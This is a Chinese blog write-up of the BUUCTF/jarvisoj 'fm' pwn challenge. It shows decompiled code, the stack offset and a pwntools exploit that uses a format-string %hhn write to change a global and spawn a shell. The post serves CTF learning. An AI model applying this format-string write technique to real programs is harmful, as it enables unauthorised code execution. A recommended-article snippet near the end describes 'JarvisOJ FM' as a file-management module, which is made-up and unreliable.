BUUCTF 刷题 jarvisoj_fm

最新推荐文章于 2025-02-25 21:39:52 发布
原创 最新推荐文章于 2025-02-25 21:39:52 发布 · 447 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #经验分享 #python

题目:BUUCTF在线评测

checksec一下,32位程序,有canary,开NX

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x8048000)

放到ida里f5一下,发现一个明显的printf格式化字符串漏洞,我们需要控制x的值为4,就可以获得binsh

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char buf; // [esp+2Ch] [ebp-5Ch]
  unsigned int v5; // [esp+7Ch] [ebp-Ch]

  v5 = __readgsdword(0x14u);
  be_nice_to_people();
  memset(&buf, 0, 0x50u);
  read(0, &buf, 0x50u);
  printf(&buf);
  printf("%d!\n", x);
  if ( x == 4 )
  {
    puts("running sh...");
    system("/bin/sh");
  }
  return 0;
}

格式化字符串研究了一会,这个算是比较简单的了。改写data段里的x。先用笨方法获得我们格式化字符串传参的地址偏移,发现是第11个。

aaaa--0xfffb6cec--0x50--0xc2--(nil)--0xc30000--(nil)--0xfffb6de4--(nil)--(nil)--0x50--0x61616161--0x70252d2d--0x70252d2d--0x70252d2d--0x70252d2d--0x70252d2d--0x70252d2d--0x70252d2d--0x70252d2d3!

“%n”是从栈上取一个地址,往这个地址里写入前面字节数的数(解释不清有点)。有个栗子吧:“%100c”是100个字符,“%100c%n”就是往地址里写100这个数字。其中要注意的是,“%hhn”是每次以一个字节写入,“%hn”是每次以两个字节写入,“%n”是每次以四个字节写入,这道题要我们把x改为4,所以用哪个都可。

exp:

from pwn import *

context(os = 'linux',arch = 'i386',log_level = 'debug')
r = process('./fm')
#r = remote('node4.buuoj.cn','26001')

x_addr = 0x0804A02C

#payload = 'aaaa' + '--%p'*20
payload = p32(x_addr) + '%11$hhn'
r.sendline(payload)


r.interactive()
~

jarvisoj_fmBUUCTF
qq_41696518的博客
08-31 431
jarvisoj_fmBUUCTF
BUUCTFjarvisoj_fm(write up)
qq_44768749的博客
08-24 554
BUUCTFjarvisoj_fm0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 开启了栈不可执行、canary以及部分RELRO保护 0x02 运行 运行未发现什么异常,但感觉应该会是格式化字符串漏洞 0x03 IDA 程序比较简单,关键部分都在主函数中,有getshell的函数,当x=4才执行system("/bin/sh") 存在格式化字符串漏洞 0x04 思路 x的值默认为3,需要利用格式化字符串漏洞改写x的值 测试格式
buuctf jarvisoj_fm
pondzhang的专栏
03-19 370
存在格式化字符串漏洞 而实际上x的值为3 需要通过格式化字符串漏洞来重写x的值 使用aaaa %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x测试格式化字符串漏洞长度 格式化字符串的漏洞的任意写地址长度为11。可以使用$n来写地址中的数据。使用%11$n,意思将0x0804A02C的x地址写入32位大小的一个...
[PWN] BUUCTF jarvisoj_fm
空城惜梦的博客
06-05 490
[PWN] BUUCTF jarvisoj_fm 按照惯例checksec ,开启了relro,canary,nx 执行程序,观察程序的逻辑,在打印出输入的字符后,会打印出3! 32IDA打开查看主要函数main,观察到在红框那里存在的很明显的格式化字符串漏洞,而且当x==4时,会得到flag,根据之前执行的程序可知,未修改x之前x的值为3,则若要修改x,需要利用格式化字符串漏洞的任意地址读写 解思路 利用 "AAAA %08x %08x %8x %08x %08x %08x %08x………… ",
buuctf jarvisoj_fm
carol2358的博客
05-04 276
先运行, AAAA %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x 得出是第11位,然后p32(x_addr)正好变成4位 from pwn import * r = remote('node3.buuoj.cn', 27373) x_addr = 0x0804A02C p = flat([x_addr, '%1...
[BUUCTF]PWN——jarvisoj_fm
mcmuyanga的博客
10-31 1586
jarvisoj_fm 附件 步骤: 例行检查,32位,开启了canary和nx保护 运行一下程序,看看大概的情况 32位ida载入,shift+f12检索程序里的字符串,看见了 " /bin/sh " 字符串 双击跟进,找到程序主体,当x=4的时候会执行system(/bin/sh) 第10行存在格式化字符串漏洞,我们可以利用它随意读写的特性让x=4 x_addr=0x804A02C 来找一下输入点的参数在栈上存储的位置,手动输入计算得到偏移为11 利用x的地址配合上%11
BUUCTF pwn——jarvisoj_fm
CNS-Enterprise BCC-1701-J
04-13 318
BUUCTF练习
【CTF】jarvisoj_fm 1
凉水的博客
07-06 675
jarvisoj_fm
jarvisoj_fm
2301_81060697的博客
02-25 536
关键函数:fmtstr_payload
BUUCTF jarvisoj_fm
2401_88087539的博客
01-21 311
pwn新手小白,写完后整理的一点点思路,有借鉴其他wp,有任何问各位师傅可以提出,接收批评指正
BUUCTF ciscn_2019_ne_5 & jarvisoj_fm
红叶的博客
11-01 836
只开起了部分RELRO与NX。IDA中发现4个函数mainGetFlagAddLog主要只需要看这3个函数。
BUUCTF-jarvisoj_fm1-WP
Rt1Text的博客
10-30 385
有canary ,目提升fm,考虑格式化字符串。
buuctfjarvisoj_fm】解
qq_29317353的博客
09-04 513
一道格式化字符串的漏洞来源buuctf
jarvisoj_fm[FmtStr]
、moddemod
06-26 419
exp from pwn import * context.log_level = 'debug' def debug_pause(): log.info(proc.pidof(p)) pause() proc_name = './fm' p = process(proc_na.
[BUUOJ]jarvisoj_fm
Do1phln的博客
11-07 374
checksec为常规保护,进入IDA分析main逻辑内部判断本应该是格式化字符串漏洞,因此进行gdb调试,下断点在漏洞printf。查找具体存储位置,发现是在第11位开始存储,所以据此构造exp。处,输入一串字符串后在gdb内。
jarvisoj_fm 1
最新发布
03-26
### JarvisOJ FM 功能概述 JarvisOJ 是一个在线编程练习平台,旨在帮助用户提升其逆向工程技能。其中的 FM(File Management)模块主要用于文件管理操作,涉及二进制文件分析、调试以及反汇编等内容[^1]。 FM 的核心功能包括但不限于以下几个方面: - **文件上传与解析** 用户可以通过该模块上传目标文件并对其进行初步解析,提取基本信息以便后续处理。 - **动态调试支持** 提供了一个集成环境用于运行和调试程序,允许设置断点、查看寄存器状态及内存数据等操作。 - **静态反汇编展示** 对于上传的目标可执行文件,能够生成对应的汇编代码视图,便于理解程序逻辑结构。 以下是实现简单文件读取的一个 Python 示例代码片段: ```python def read_binary_file(file_path): try: with open(file_path, 'rb') as file: content = file.read() return content except Exception as e: print(f"Error reading the binary file: {e}") ``` 此代码展示了如何打开并读取一个二进制文件的内容到内存中,这是许多基于文件的操作的第一步,在 JarvisOJ FM 中可能被用来加载待分析样本。 ### 常见问解答 当使用 JarvisOJ FM 进行学习时可能会遇到一些典型疑问如下: #### 文件无法成功上传? 这可能是由于服务器端配置限制或者客户端网络连接不稳定引起的问。建议检查所选文件大小是否超出规定上限,并确认当前互联网状况良好再尝试重新提交作业。 #### 调试过程中崩溃怎么办? 如果在利用内置工具对项目进行单步跟踪期间发生异常终止现象,则需仔细核查输入参数合法性;另外也要留意是否存在未初始化变量引用等情况造成非法访问错误。 #### 如何更高效地阅读大量汇编码? 除了依赖自动化插件辅助外,培养扎实的基础理论知识同样重要。平时应多加实践各类算法转换过程中的机器指令表达形式,逐渐形成快速定位关键路径的能力。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Hello Sally

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值